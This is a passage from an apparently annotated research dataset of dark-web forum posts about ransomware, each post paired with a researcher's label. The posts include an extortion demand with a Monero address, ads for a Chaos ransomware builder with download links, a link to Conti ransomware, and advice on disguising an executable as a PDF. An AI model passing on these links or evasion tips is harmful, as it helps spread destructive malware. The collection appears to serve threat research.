want something in return otherwise this time i am going to leak thousands and thousands of versus accounts all with purchases and pending orders.;;as you know my jabber is phishkingzofficial@xmpp.jp;;i don���t want to bking millions from this market and i have tried to help from day one.;;you already know i have absolutely thousands of accounts .;;20 xmr and nothing will be leaked and you know i am a man of my word just like last time;;471zds2ftfwsbdxklezms65gexila2gfvkwqcybmx7ckckew5xuyctwlvuuhubsypmpc8rnyncnunetwghb9rdk28ars7";;----;;-----begin pgp signed message-----;hash: sha512;;stay safe!;;e.a.p.;-----begin pgp signature-----;;iqktbaebcgb9fieeq9l6supyrvesleuwxbphxqilajyfamht00hffiaaaaaalgao;axnzdwvylwzwckbub3rhdglvbnmub3blbnbncc5mawz0aghvcnnlbwfulm5ldefc;rdjgqtq5nee1oeffrjdbqzjertuxnjveqjndnzvfqtiyntzbmzyacgkqxbphxqil;ajyi/baazlbioy4zryf9n5zkfe0xuj6ecao2/noe8ongkjcuiyz6sagdythpe0bd;vn5vkww8mdhpkmuay2nzrjbde00mhldq3upaplzqtqhwrdz6bvpkvbgysree92+o;wccix3+enonjmejsgj//kmshvvtjzx5hivonvslqug+kz9qhi5j9g+fuegpedeg1;atqmij4nokm8aiwprh8wgbfh2omacmo91mtctnk4hncehqd1wcyyggi1hicc6eqv;mdtyi8oewluipeekb5tz5fggs6ua2jbivizpmld8zrcynotmpftcomavjttkhlov;0gwv8hbk4f/sprjol3ur0vbbh6pwt/q65zbflmuu3zrodsqssm7rodpy3ojnbw3b;sqsoed0qwbhpexn//bgvka9wtxvpttkxumhs2drpcae1oz0irc+4jg3n/0sqsvus;k/goozhmzlgnucnlolibd9ogicd9o5g4tja3nfydqo8pj5kjq9lmmfyhenmj9iyj;r5zbbgkvmme0sfo/qv9n/tyhhv0naxzl5c6pw8uwy768yg2ec1ppnnfldzwqjr52;zmjx6nsdfhp4yhbb/+yss+sub/jkoadlr8glca95dgspc9hi8visvxs8/anptqam;33rljkj4barsabizcxex7zpubt5gexz6zdk8vmdai6d9xe+kzgu=;=rzpg;-----end pgp signature-----</t>
  </si>
  <si>
    <t>Moderator notifying community on attempted extorition attempt - does ot engage</t>
  </si>
  <si>
    <t>/u/Edgar_Allan_Poe</t>
  </si>
  <si>
    <t>23/01/2022 22:15</t>
  </si>
  <si>
    <t>/d/Versus</t>
  </si>
  <si>
    <t>d55fb527d326fa90c2a1</t>
  </si>
  <si>
    <t>Change your passwords (attempted blackmail from phisher)</t>
  </si>
  <si>
    <t>45 days 03:40:00</t>
  </si>
  <si>
    <t>via ransomware, there is lot of website where you can get free data about them on ransomware uploaders</t>
  </si>
  <si>
    <t xml:space="preserve">post recommending a user use ransomwar to gain information in order to create a new idenity to avoid law enforcement </t>
  </si>
  <si>
    <t>/u/nasyer</t>
  </si>
  <si>
    <t>/d/FakeIDUK</t>
  </si>
  <si>
    <t>7217d53428862e2a9364</t>
  </si>
  <si>
    <t>Changing identitiy UK</t>
  </si>
  <si>
    <t>0 days 04:26:00</t>
  </si>
  <si>
    <t>6 days 00:37:00</t>
  </si>
  <si>
    <t>hi guys. please give your thought and suggestion about my new chaos ransowmare.;chaos ransomware is multi language ransomware. you can translate dropped file name and your note to any language. you can grant admin privileges, delete all volumes shadow copies, delete backup catalog and disable windows recovery mode. it overwrites all files on the computer (it means nobody can ever return files back) and makes it at least 2 times faster than other ransomwares. it drops read_it.txt(you can change dropped file name for example something.txt) for startup folder and all folders which files has been encrypted;;download link:;https://github.com/hetropo/chaos-ransomware;;try only in virtual machine;;github account been banned new links below:;https://www.file.io/download/nketu7elpqo1;https://easyupload.io/vetnp7</t>
  </si>
  <si>
    <t>user asking for feedback for their ransomware (chaos) and promoting it</t>
  </si>
  <si>
    <t>raas provider (individual) / potential hacker (individual)</t>
  </si>
  <si>
    <t>/u/bagli</t>
  </si>
  <si>
    <t>15/06/2021 15:55</t>
  </si>
  <si>
    <t>da81670ed67e19ee6189</t>
  </si>
  <si>
    <t>Chaos Ransomware Builder v2</t>
  </si>
  <si>
    <t>7 days 08:00:00</t>
  </si>
  <si>
    <t>i may have a project for you to try the ransomware you're working on, if you're interested, you can write to me directly.</t>
  </si>
  <si>
    <t xml:space="preserve">User providing a oppotunity to test another persons ransomware </t>
  </si>
  <si>
    <t>/u/freshusa23</t>
  </si>
  <si>
    <t>22/06/2021 23:55</t>
  </si>
  <si>
    <t>6 days 06:41:00</t>
  </si>
  <si>
    <t>hi guys. please give your thought and suggestion about my new chaos ransowmare.;chaos ransomware is multi language ransomware. you can translate dropped file name and your note to any language. you can grant admin privileges, delete all volumes shadow copies, delete backup catalog and disable windows recovery mode. it overwrites all files on the computer (it means nobody can ever return files back) and makes it at least 2 times faster than other ransomwares. it drops read_it.txt(you can change dropped file name for example something.txt) for startup folder and all folders which files has been encrypted;;be careful and  try it on virtual machine;download links:;https://www.mediafire.com/file/fwhvaz1q1ukesp3/chaos_ransomware_builder.zip/file;https://disk.yandex.com/d/uywlrfwngddgza;https://mega.nz/file/dxxuqlat#c8iahgpjp_fffvnijkughoyeuhufgqmda1j10dy4ne4;https://ufile.io/kv14aef5;https://dropmefiles.com/jtuq8;https://easyupload.io/n2djzy</t>
  </si>
  <si>
    <t>17/06/2021 01:43</t>
  </si>
  <si>
    <t>18bfb750adcb9ff711fb</t>
  </si>
  <si>
    <t>Chaos Ransomware v2</t>
  </si>
  <si>
    <t>6 days 00:09:00</t>
  </si>
  <si>
    <t>try in virtual machine !;chaos is multi language ransomware which means you can translate your note to any language. this ransomware encrypts all files and drops a note for every folder in which files have been encrypted. you can overwrite all files or encrypt them with aes/rsa encryption method. create your decrypter using the advanced option. public and private keys will be created automatically. keep private key and decrypter. without them files cannot be returned.this project depends on your donation. please donete if you want to see next releases in the future;;bitcoin: bc1qlnzcep4l4ac0ttdrq7awxev9ehu465f2vpt9x0;monero :44wjkzwrzwy7dxlov4ejvia3wmwaj6ige6a8c6ehkxktvy8ptu3sncg6a6do3vl4cu3kluedkwjomdke754qhshvjw52xfv;;download links:;;https://ufile.io/pj1xxc6f;https://ws.onehub.com/files/viqsummi;https://disk.yandex.com.tr/d/9fjbjh8xtngnjw;https://www.file.io/download/czdppakabdwg;https://mega.nz/file/jdbjhsht#4fhf4ysfkymywfidkwzrrn88eypek2kpfn29quvvi_8</t>
  </si>
  <si>
    <t>75660cfe4ace83328d31</t>
  </si>
  <si>
    <t>Chaos ransomware builder v3</t>
  </si>
  <si>
    <t>0 days 21:54:00</t>
  </si>
  <si>
    <t>trying to make people not to use ransomware? miserable good boy</t>
  </si>
  <si>
    <t>conversation on not using ransomware</t>
  </si>
  <si>
    <t>video tutorial about how to use decrypter.;https://vimeo.com/570949022</t>
  </si>
  <si>
    <t>Chaos ransomware creator providing education on how to use the decryptor</t>
  </si>
  <si>
    <t>i'll try it on a throwable vds , keep the great work.</t>
  </si>
  <si>
    <t>Praise for the ransomware</t>
  </si>
  <si>
    <t>/u/SV2MG</t>
  </si>
  <si>
    <t>e535639737fb23a41f81</t>
  </si>
  <si>
    <t>Chaos ransomware builder v3 + decrypter</t>
  </si>
  <si>
    <t>0 days 01:56:00</t>
  </si>
  <si>
    <t>1 days 09:00:00</t>
  </si>
  <si>
    <t>trying to make people not to use ransomware? good boy</t>
  </si>
  <si>
    <t>0 days 12:05:00</t>
  </si>
  <si>
    <t>he is just a good boy trying to make people not to use ransomware :)</t>
  </si>
  <si>
    <t>c7578f0d6ee75546eb50</t>
  </si>
  <si>
    <t>0 days 02:33:00</t>
  </si>
  <si>
    <t>0 days 14:42:00</t>
  </si>
  <si>
    <t>0 days 07:04:00</t>
  </si>
  <si>
    <t>try in virtual machine !;some bugs are fixed and in this version you can do:;1.change desktop wallpaper;2.add your own extensions.;3. encrypt files under 2mb with aes/rsa (previous version was 1mb);chaos is multi language ransomware which means you can translate your note to any language. this ransomware encrypts all files and drops a note for every folder in which files have been encrypted. you can overwrite all files or encrypt them with aes/rsa encryption method. create your decrypter using the advanced option. public and private keys will be created automatically. keep private key and decrypter. without them files cannot be returned.this project depends on your donation. please donete if you want to see next releases in the future;;bitcoin: bc1qlnzcep4l4ac0ttdrq7awxev9ehu465f2vpt9x0;monero :44wjkzwrzwy7dxlov4ejvia3wmwaj6ige6a8c6ehkxktvy8ptu3sncg6a6do3vl4cu3kluedkwjomdke754qhshvjw52xfv;;download links:;https://easyupload.io/yy5apo;https://disk.yandex.com.tr/d/sd3nzzbwi8dtjw;https://mega.nz/file/6egsvtdk#dpey_4pwe ... mdqctbixiw;https://drive.google.com/file/d/1g3ieye ... sp=sharing;https://cloud.mail.ru/public/dven/7nf8gj2v2;https://file.io/fkaasofgsghu</t>
  </si>
  <si>
    <t>0b15cf0a93374e11ffc5</t>
  </si>
  <si>
    <t>Chaos ransomware builder v4 + decrypter</t>
  </si>
  <si>
    <t>1 days 07:18:00</t>
  </si>
  <si>
    <t>video tutorial:;https://vimeo.com/manage/videos/582848063</t>
  </si>
  <si>
    <t>added features:;disable task manager;encrypt whole c drive;faster than before;;fixed;bug in decryption;limitation of file size;;download ransomware chaos:;;https://cloud.mail.ru/public/6hur/kyc...;https://file.io/nu7sxjunoa6t;https://mega.nz/file/gc5rlahd#mhkzjro...;https://ufile.io/mrm7oyjt;https://filebin.net/q2905mmbkudf7ug3</t>
  </si>
  <si>
    <t>48fe254d5a6d8775c1cd</t>
  </si>
  <si>
    <t>Chaos ransomware builder v5</t>
  </si>
  <si>
    <t>72 days 01:50:00</t>
  </si>
  <si>
    <t>;;cheap ransomware uwu;;by;/u/thorchan;���;1 year ago;in;/d/nemesismarket;;0 points;���;</t>
  </si>
  <si>
    <t>/u/thorchan</t>
  </si>
  <si>
    <t>19/07/2021 04:50</t>
  </si>
  <si>
    <t>d06606d1ff5e18b1d59a</t>
  </si>
  <si>
    <t>Cheap Ransomware Uwu</t>
  </si>
  <si>
    <t>;for the land of 1���s and 0���s;;stealistan has always prided itself for being the most technologically advanced nation in the world. the one thing that all stealistanians have in common is there love of technology and the belief of integrating technology in all aspects of life. recently, there has been a steadily growing population of non-technology believers living among us. this has been a personal concern of mine, and i���ve been raising this concern, shedding light on the harmful effects of having these non-technology believers living in our nation with little to no success. i shared these concerns with the organization i worked with (fancy pants) on many occasions, but unfortunately, we never saw eye to eye on this critical issue.;;this is when i decided to leave fancy pants and create an organization with like-minded, technology-loving stealistanians, who believe that we must take action and shed light on the harm those non-believers are bringing to our nation. the hackers liberationreated with the central goal of creating disruptions in stealistan in areas where non-believers are residing. these disruptions will be technology-driven and include crippling cyber-attacks on national critical infrastructure, ransomware attacks on hospitals treating technology non-believers, and data leaks of personal data of the non-believers on the dark web. we believe that by doing so, the government will finally acknowledge that we as a nation are being harmed by harboring non-believers. at first, our actions might seem evil in nature, but soon stealistanians will see that these actions are what will enable stealistan to maintain its technological advantage world-wide.;;there are those in stealistan who think that the battle of getting rid of the non-believers is lost. they couldn���t be more wrong. this is just the beginning of the fight. i am honored to head the fight to reclaim my nation���s unified belief in technology. if you believe in this cause as well, there are several ways you can  a young organization and we are constantly looking into recruiting like-minded stealistanians. join our discord channel to know more. the campaigns we run also require financing. consider donating to our honorable cause using the below mentioned bitcoin address. and it is only through the efficient organization of people around a cause to crush the opposition so that it may survive.;;signed:;;a.v.;founder of the hackers liberation front;;bitcoin address: 3gyfnxvmhqkm1gyzdcokshabntu1favqvs;;discord channel:;https://discord.com/invite/5fqkc5j;;;osint challenge code word:;;yougotaflag!;</t>
  </si>
  <si>
    <t>Post talking about the hackers manifesto (include ransomware)</t>
  </si>
  <si>
    <t>/u/avindek</t>
  </si>
  <si>
    <t>16/10/2020 09:10</t>
  </si>
  <si>
    <t>df10b7ef6066ca30f333</t>
  </si>
  <si>
    <t>Check out the Hackers Liberation Front Manifesto</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;a well-known chinese state-backed apt group is believed to have been responsible for multiple ransomware attacks against firms last year, according to new research. a report from security joes and pro reveals how the vendors uncovered the links after investigating an incident in which ransomware encrypted ���several core servers��� at an unidentified victim organization.;;they found samples of malware linked to the drbcontrol campaign which targeted major gaming companies and is associated with two well-known chinese-backed groups, apt27 (aka emissary panda) and winnti. specifically, they claimed to have detected an older version of the clambling backdoor used in that campaign, an aspxspy webshell previously used by apt27, and the plugx rat which is often used in chinese attacks.;;although winnti is known for financially motivated attacks, apt27 is generally more focused on data theft. however, the latter has previously been linked to one ransomware attack, featuar variant.;;���there are extremely strong links to apt27 in terms of code similarities and ttps,��� the report noted. ���this incident occurred at a time when where covid-19 was rampant across china with lockdowns being put into place, and therefore a switch to a financial focus would not be surprising.���;;the attack itself does not seem to have been particularly sophisticated. the initial vector was a third-party service provider that itself had been infected by a third party, and the attackers used windows own bitlocker encryption tool to lock down targeted servers.;;aspxspy was deployed for lateral movement and plugx and clambling were loaded into memory using a google updater executable vulnerable to dll side-loading. popular open source tool mimikatz was also used in the attack and a publicly available exploit for cve-2017-0213 was used to escalate privileges.;;gaming firms are an increasingly popular target among financially motivated attackers, according to new research release threat intelligence firm claimed to have discovered one million compromised internal accounts from gaming companies on the dark web, and 500,000 breached credentials belonging to employees.</t>
  </si>
  <si>
    <t>news article describing how a chinese apt group is supposedly related to a series of ransomware attacks</t>
  </si>
  <si>
    <t>b73f43f92d9a51345c85</t>
  </si>
  <si>
    <t>Chinese APT Group Linked to Ransomware Attacks</t>
  </si>
  <si>
    <t>{'ransomware': 3}</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;by kartikay mehrotra;;the dark web page belonging to the ransomware group accused of attacking colonial pipeline co. attack has gone down. darkside, the group suspected for the attack, has told other hackers that it shutting down amid law enforcement pressure.;;the colonial breach forced the company to shut down operations, triggering fuel shortages in parts of the u.s. some evidence has linked darkside's operations to russia and other eastern european countries.;;multiple hackers have cited a may 13 announcement shared with darkside affiliates saying that the group had lost access to their blog and payment servers and would be closing, according to kimberly goody, senior manager of financial criminal analysis at fireeye inc.'s mandiant.;;darkside provides its malware to customers, or affiliates, it what is known as "ransomware as a service. the post cited law enforcement pressure from the united states for this decision," goody said, in a statement. mandiant hasn't been able to independently verify the claims.;;ransomware is a type of malware that encrypts a victim's data; the groups sometime steal data too. the hackers then ask for a payment to unlock the files or return the stolen data.;;darkside maintains at least eight domains or websites on the dark web. one is a public-facing website used by darkside and its hackers-for-hire to name and shame victims who've ignored or refused the group's ransom demands. the other seven sites are used by the group to host the data they've stolen.;;four of those seven domains are also down. three are loading blank, white pages. one simply reads, "darkside cdn." cdn stands for content delivery network.;;dark web researchers speculated that the outage could be darkside's effort to duck law enforcement given the turmoil caused by the attack. "darkside is likely going to go quiet and rebrand itself, as we've observed with other dark net ransomware operators in the past when they became targets of law enforcement," said mark turnage, co-founder of darkowl, a dark web and cyber research firm.;;some ransomware groups maintain pages on the dark web where they post stolen documents to pressure victims into paying or list the names of companies that have refused their demands. darkside's site posted what appeared to be three new victims on its site as recently as may 12, as they continued to leak new data on the site for existing digital hostages.;;in a message posted after the colonial attack, the group hinted at contrition and that a "partner" might be to blame.;;"we are apolitical. we do not participate in geopolitics," the message said. "our goal is to make money and not creating problems for society. from today, we introduce moderation and check each company that our partners want to encrypt to avoid social consequences in the future."</t>
  </si>
  <si>
    <t xml:space="preserve">news article stating the darkside website containing the informaton gained from the conolal pipeline attack has gone down. </t>
  </si>
  <si>
    <t>23/05/2021 19:50</t>
  </si>
  <si>
    <t>30becdd920fd16c21518</t>
  </si>
  <si>
    <t>Colonial Hacker Group's Dark Web Site No Longer Accessible</t>
  </si>
  <si>
    <t>{'darkside': 2, 'ransomware': 3}</t>
  </si>
  <si>
    <t>"darkside is likely going to go quiet and rebrand itself"...honestly they probably rebranded themselves within a couple weeks of launching so they can move to a already established company. these people are not stupid.</t>
  </si>
  <si>
    <t>Post stating that darkside have most likely rebranded temselves after the pipeline attack</t>
  </si>
  <si>
    <t>/u/francox9</t>
  </si>
  <si>
    <t>23/05/2021 19:52</t>
  </si>
  <si>
    <t>the citadel dispatch podcast had some interesting comments about the colonial pipeline ransomware attack and darkside's use of bitcoin and monero for collecting ransom payments.;;https://twitter.com/donttracemebruh/status/1392616456844681220;;full podcast here:;https://twitter.com/matt_odell/status/1392225050930020355</t>
  </si>
  <si>
    <t>Post recommending the citidel dispatch podcast for opinions of the colonal pipeline attack</t>
  </si>
  <si>
    <t>/u/McCoyPauly</t>
  </si>
  <si>
    <t>13/05/2021 17:01</t>
  </si>
  <si>
    <t>/d/privacycoins</t>
  </si>
  <si>
    <t>24211e8373fc9415bcf5</t>
  </si>
  <si>
    <t>Colonial and DarkSide: Bitcoin, Monero and ransomware</t>
  </si>
  <si>
    <t>taiwan-based leading memory and storage manufacturer adata says that a ransomware attack forced it to take systems offline after hitting its network in late may.;;adata manufactures high-performance dram memory modules, nand flash memory cards, and other products, including mobile accessories, gaming products, electric power trains, and industrial solutions.;;the company was ranked as the second-largest dram memory and solid-state drives (ssd) maker in 2018.;;the taiwanese memory manufacturer took down all impacted systems after detecting the attack and notified all relevant international authorities of the incident to help track down the attackers.;;"adata was hit by a ransomware attack on may 23rd, 2021," the company told bleepingcomputer in an email statement today.;;adata's business operations are no longer disrupted according to the memory maker, with affected devices being restored and services closing regular performance.;;"the company successfully suspended the affected systems as soon as the attack was detected, and all following necessary efforts have been made to recover and upgrade the related it security systems," adata added.;;"gladly things are being moved toward the normal track, and business operations are not disrupted for corresponding contingency practices are effective.;;"we are determined to devote ourselves making the system protected than ever, and yes, this will be our endless practice while the company is moving forward to its future growth and achievements.";;adata did not provide information on the ransomware operation behind the incident or any ransom demands. however, the attack has already been claimed over the weekend by the ragnar locker ransomware gang.;;ragnar locker says that they have allegedly stolen 1.5tb of sensitive data from adata's network before deploying the ransomware payloads.;;so far, the ransomware gang has only posted screenshots of stolen files and folders as proof of their claims, but they are threatening to leak the rest of the data if the memory manufacturer doesn't pay the ransom.;;according to the screenshots already posted by ragnar locker on their dark web leak site, the attackers could collect and exfiltrate proprietary business information, confidential files, schematics, financial data, gitlab and svn source code, legal documents, employee info, ndas, and work folders.;;ragnar locker ransomware activity was first observed being deployed in attacks against several targets in late december 2019.;;on compromised enterprise endpoints, ragnar locker operators terminate remote management software (such as connectwise and kaseya) used by managed service providers (msps) to manage clients' systems remotely.;;this allows the attackers to evade detection and ensure that admins logged in remotely do not block the payload deployment process.;;the fbi warned private industry partners of increased ragnar locker ransomware activity after an april 2020 attack that impacted the network of multinational energy giant energias de portugal (edp).;;as seen by bleepingcomputer, ragnar locker ransom demands range from $200,000 to roughly $600,000. however, ragnar locker demanded a ransom of 1580 bitcoins (the equivalent of over $10 million) in edp's case.</t>
  </si>
  <si>
    <t>Post describing the ransomware attack on ADATA by Ragnar Locker ransomware</t>
  </si>
  <si>
    <t>4e835283d7515703ff8c</t>
  </si>
  <si>
    <t>Computer memory maker ADATA hit by Ragnar Locker ransomware</t>
  </si>
  <si>
    <t>{'ransomware': 8}</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the alamance skin center needs patients to confirm their upcoming appointments after losing data in a ransomware attack, according to a cone health news release.;;hackers did not get any patient data, cone health says, but the practice also could not retrieve information on patients, according to the release. the skin center���s medical records system is on a separate server from cone health���s main system, so the attack was isolated.;;the attack was in late july, and the hospital system determined its data were not retrievable oct. 21. hipaa laws require reporting breaches of private patient information, according to the release. cone health believes the attack was either phishing ��� emails sent to employees to trick them into opening files or links to malware ��� or ���brute force��� ��� sending many possible passwords until something works.;;ransomware generally gets into a data system and threatens to destroy it unless a ransom on the rise at least in part because the programs used in the attacks can be bought on the dark web, so it doesn't take a very sophisticated attacker to pull one off. employee training and data backups are the defenses cyber security experts talk about the most.;;patients of the skin center should get letters from cone health with information about how they can protect themselves and monitor their credit reports.</t>
  </si>
  <si>
    <t xml:space="preserve">News post describing the ransomware attack on the alamance skin centre  </t>
  </si>
  <si>
    <t>fa7424687b463a9cda17</t>
  </si>
  <si>
    <t>Cone Health Practice Loses Data in Ransomware Attack</t>
  </si>
  <si>
    <t>conti ransomware - http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/download/file.php?id=1413</t>
  </si>
  <si>
    <t>Post providing a link to the conti ransomware</t>
  </si>
  <si>
    <t>16/06/2022 02:35</t>
  </si>
  <si>
    <t>6c5a7915dfe64eec3493</t>
  </si>
  <si>
    <t>Conti Ransomware</t>
  </si>
  <si>
    <t>the computer emergeny response team of ukraine (;cert-ua;) warned of ongiong spear-phishing campaign targeting private email accounts of ukranian armed forces personnel. they attributed the campaign to the belarus-linked cyberespionage group called;unc1151;.;;mid-january, goverment in kyiv attributed the defacement of tens of ukranian goverment webistes to belarusian apt group;unc1151;;ukranian! all your personal data has been sent to a public network. all data on your computer is destroyed and cannot be uncovered.;;;ukraine was reciruiting a volunteer it army of cyber security experts and white hat hackers to launch cyberattacks on a list of russian entities. the list is composed of 31 tragets including russian critical infrastructure, goverment agencies, banks and hosting providers.;;ukraine's minister for digital transformation mykhaylo fedorov called to action against russia attempting to create an;"it army";to launch massive cyber offensive against russia.;;;we are creating an it army. we need digital talents. all operational tasks will be given here:;https://t.co/le4esfxosn;. there will be tasks for everyone. we continue to fight on the cyber front. the first task is on the channel for cyber specialists.;;telegram channel was used to coordinate the efforts and plan the cyber-attacks that will be conducted by the it army. below is the list of of targets shared on telegram:;;;;;target;;url;;;;gazprom;;https://www.gazprom.ru/;;;;lukoil;;https://lukoil.ru/;;;;magnit;;https://magnit.ru/;;;;norilsk nickel;;https://nornickel.com/;;;;surgetneftegas;;https://surgetneftegas.ru/;;;;tatneft;;https://tatneft.ru/;;;;evraz;;https://ervaz.com/ru/;;;;nlmk;;https://nlmk.com/;;;;sibur holing;;https://sibur.ru/;;;;severstal;;https://severstal.com/;;;;metalloinvest;;https://metalloinvest.com/;;;;nnc;;https://nangs.org/;;;;russian copper company;;https://rmk-group.ru/ru/;;;;tmk;;https://tmk-group.ru/;;;;yandex;;https://ya.ru/;;;;polymetal international;;https://polymetalinternational.com/ru/;;;;uralkali;;https://uralkali.com/ru/;;;;eurosibenegro;;https://eurosib.ru/;;;;omk;;https://omk.ru/;;;;banks sberbank;;https://sberbank.ru/;;;;vtb;;https://vtb.ru/;;;;gazprombank;;https://gazprombank.ru/;;;;state public serices;;https://gosuslugi.ru/;;;;moscow state services;;https://mos.ru/uslugi/;;;;president of the russian federation;;https://kremlin.ru/;;;;goverment of the russian federation;;https://surgetneftegas.ru/;;;;ministry of defense;;https://mil.ru/;;;;tax;;https://nalog.gov.ru/;;;;customs;;https://customs.gov.ru/;;;;pension fund;;https://prf.gov.ru/;;;;roskomnadzor;;https://rkn.gov.ru/;;;;volunteers could submit an application via google docs, detailing their professional cyber skills. the post was written by yegor aushev, co-founder of the ukrainian cybersecurity firm;cyber unit technologies;. the cybersecurity expert said he wrote the post at the request of a senior defense ministry official who contacted him on thursday.;;;volunteers would be divided into defensive and offensive cyber units. the defensive unit would be employed to defend infrastructure such as power plants and water systems. in a;2015 cyberattack;, widely attributed to russia state hackers, 225,000 ukrainians lost electricity. the offensive volunteer unit is organizing would help ukraine���s military conduct digital espionage operations against invading russian forces.;;on the other side, some prominent ransomware gangs seem to be ready to provide their support to russia. one of these gangs is the;conti ransomware;gang, it published the following message;on its leak site;:;;;as a response to western warmongering and american threats to use cyber warfare against the citizens of russian federation, the conti team is officially announcing that we will use our full capacity to deliver retaliatory measures in case the western warmongers attempt to target critical infrastructure in russia or any russian-speaking region of the world. we do not ally with any government acondemn the ongoing war. however, since the west is known to wage its wars primarily by targeting civilians, we will use our resources in order to strike back if the well being and safety of peaceful citizens will be at stake due to american cyber aggression.;;one cybersecurity researcher had access to their;ejabberd;server backend, and when he found out about their decision to side with russian federation he decided to dump the whole xmpp chat logs from that server. in total, there are 393 leaked json files containing a total of 60,694 messages since january 21, 2021, through today. there are also conti/trickbot conversations regarding;diavol ransomware operation;. additionaly, 239 bitcoin addresses representing $13.1 million in payments from the conti leak have been added to;ransomwhere;webiste used to track all addresses connected to ransomware.;;after ukrainian conti affiliates grew upset over the siding with russia, the conti gang replaced their message with another one, stating that they;"do not ally with any government";and that they;"condemn the ongoing war.";but, just too little and too late. on the other side;lockbit 2.0;said very clearly that their operation is financialy motivated and that they don't care about politics, therefore won't take any sides in this conflict.;;;leaked data (chat logs):;;http://linx4f75phtm63mxalb2wtspofcodku5lwofiyoupda4n4uc6cfjuzid.onion/conti-xmpp.tgz;;rest of the data provided by;/u/tito33;;https://share.vx-underground.org/conti/;</t>
  </si>
  <si>
    <t>news post describing a leak in the conti ransomware group showing multiple IP addresses and payments</t>
  </si>
  <si>
    <t>news / information (provider)</t>
  </si>
  <si>
    <t>80b6344cee4c6ef59a2e</t>
  </si>
  <si>
    <t>Conti ransomware leak</t>
  </si>
  <si>
    <t>0 days 19:18:00</t>
  </si>
  <si>
    <t>great info provided here.</t>
  </si>
  <si>
    <t>user praising the information provided and the leak</t>
  </si>
  <si>
    <t>/u/BigDaddy2K</t>
  </si>
  <si>
    <t>0 days 10:08:00</t>
  </si>
  <si>
    <t>thx for posting;;should have seen this before making another post;and crossposting it;;;there is more to the leaks actually;this is just one part</t>
  </si>
  <si>
    <t>0 days 07:03:00</t>
  </si>
  <si>
    <t>yeah, this was just a sample.</t>
  </si>
  <si>
    <t>0 days 02:05:00</t>
  </si>
  <si>
    <t>beauty is in the eye of the beholder.</t>
  </si>
  <si>
    <t>i am glad about it. deffinitelly the most disgusting bootlickers among ransomware groups, who 'had balls' to lock hospitals, but were publiclly apologizing to saudi and uae jihadist royals after leaking some their info, and deleting the leaks.;;they had one more leak, before some 6-7 months, done by one of their affiliates who was ripped of for his/her comission, but in that leak was just ips of couple of c2 cobalt servers, and guides given to affiliates;;here they have bunch of their internal chat logs from jabber and rocket chat;and source code of decryptor;;conti idi na huj;;share.vx-underground.org/conti</t>
  </si>
  <si>
    <t>User shaming various people in ransomware groups for attacking hospitals but publicly apologising to saudi royalists</t>
  </si>
  <si>
    <t>e33b428107639d91e0a8</t>
  </si>
  <si>
    <t>Conti ransomware team openly supported Russian invasion and  got their insider shit leaked again</t>
  </si>
  <si>
    <t>102 days 10:36:00</t>
  </si>
  <si>
    <t>;;conti ransomware team openly supported russian invasion and  got their insider shit leaked again;;by;/u/tito33;���;8 months ago;in;/d/cafedread;;3 points;���;</t>
  </si>
  <si>
    <t>User providing information showing conti supossedly openly suported russian invasion and thus got their information leaked</t>
  </si>
  <si>
    <t>004ec287003668273961</t>
  </si>
  <si>
    <t>/d/Yugoslavia</t>
  </si>
  <si>
    <t>1b9302fdf2f4b52b5f30</t>
  </si>
  <si>
    <t>d3cc1a3bf46f972d449c</t>
  </si>
  <si>
    <t>this one sparks joy.</t>
  </si>
  <si>
    <t>Post showing praise for the conti ransomware group having their information leaked due to supossedly supporting the russian invasion</t>
  </si>
  <si>
    <t>0 days 02:47:00</t>
  </si>
  <si>
    <t>i know very well history of that region;and i can say opeenly  fuck putin, fuck zelensky, fuck bandera, fuck bolsheviks, fuck tsarists...;;the only political/historical figure from that region worthy of any respect imo is nestor makhno;;;but still, altough both sides in ukranian war are politically very problematic to me, it is still very clear who is victim and who is opresor;;and helping ukranian civilians is one thing, supporting mf zelensky or his azov is something different. and i would never support them;;but how and why can be justified to support putin ? and his invasion ?;based on what for fuck sake</t>
  </si>
  <si>
    <t>0 days 03:22:00</t>
  </si>
  <si>
    <t>okay i want thanks on begin to my people which help me on my last post;so you know i was finished my ransomware 0/26 so its fud but now i am not sure how convert is to pdf;;i cannot find some info,i go just evilpdf but its not work me thanks for reply be safe</t>
  </si>
  <si>
    <t xml:space="preserve">Raas creator asking for advice on how to complete their ransomware </t>
  </si>
  <si>
    <t>13/11/2021 06:28</t>
  </si>
  <si>
    <t>3106d0b473b79d37dd80</t>
  </si>
  <si>
    <t>Convert exe to pdf</t>
  </si>
  <si>
    <t>1 days 08:46:00</t>
  </si>
  <si>
    <t>i'm pretty positive that you can't just make it to where there's a pdf file that will run your exe when opened unless you are utilizing an exploit in the pdf viewing program to execute your shellcode. you can embed javascript in a pdf, and there are some tricks to spoof file extensions for people viewing the file from in windows. like the pif trick, or using the unicode thing that reverses the end characters.;;but as far as i'm aware what you're trying to do isn't possible through any straightforward means.</t>
  </si>
  <si>
    <t>user providing answers for the advice asked</t>
  </si>
  <si>
    <t>/u/socat2me</t>
  </si>
  <si>
    <t>13/11/2021 08:56</t>
  </si>
  <si>
    <t>0 days 02:28:00</t>
  </si>
  <si>
    <t>https://github.com/henriksb/extensionspoofer first internet result</t>
  </si>
  <si>
    <t>13/11/2021 10:48</t>
  </si>
  <si>
    <t>0 days 01:52:00</t>
  </si>
  <si>
    <t>expert stats indicate that the raging covid-19 pandemic has not only wrecked the stock market, but hurt the dark web economy too. the numbers show that darknet marketplaces have not been spared the worldwide uncertainty that has sent entire industries crashing.;;in the context of cryptocurrency spending, the internet underworld has witness a 33% decline in the volume of digital assets sent to various addresses. considering the fact that bitcoin and other cryptocurrencies have become the preferred mode of payment within dark web corridors, there is no telling about the amount of damage that the hidden web ecosystem has sustained in the current public health crisis.;;expectedly, cybercriminals have exhibited varied responses to the pandemic-induced darknet market crisis. to adjust, some of the existing darknet marketplaces have shown normalcy as far as their product listings are concerned.;;otherwise significant number of the platforms have sunk to serious levels of amorality. basically exploiting the fear and uncertainty plaguing the population through targeted advertising and fraud schemes.;;a webinar organized by chainalysis on april 15, which focused on effects of the coronavirus pandemic on cryptocurrency crime, revealed that criminals have put ���coronavirus-infected blood��� for sale on the dark web.;;in a specific case, a dark web vendor has claimed to be selling coronavirus-infected blood that has been injected into bats. the same vendor claims that the blood was drawn from his parent who was a hospitalized covid-19 patient.;;the ���blood for sale��� is being sold for 0.005 btc per bat. at this point, it is very difficult to figure out whether the vendor is truly selling 